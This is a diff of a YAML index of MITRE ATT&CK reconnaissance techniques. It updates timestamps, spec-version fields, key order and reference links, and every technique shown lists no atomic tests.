@@ -55790,11 +56487,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55834,9 +56530,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55898,7 +56593,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55924,7 +56618,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55945,8 +56639,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -56011,7 +56703,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -56059,7 +56750,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -56081,7 +56771,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -56097,34 +56787,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56133,15 +56799,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -56163,7 +56852,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56179,8 +56868,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -56241,29 +56928,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -56272,15 +56940,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -56306,7 +56993,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -56324,47 +57011,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56373,19 +57023,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -56408,7 +57094,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56424,8 +57110,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -56451,7 +57135,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56467,8 +57151,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -56496,7 +57178,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56512,12 +57194,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56526,16 +57206,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56548,8 +57228,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56560,52 +57240,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -56627,7 +57305,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56643,8 +57321,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -56670,7 +57346,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56688,8 +57364,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -56711,7 +57385,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56727,12 +57401,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -56742,17 +57414,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -56764,6 +57439,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
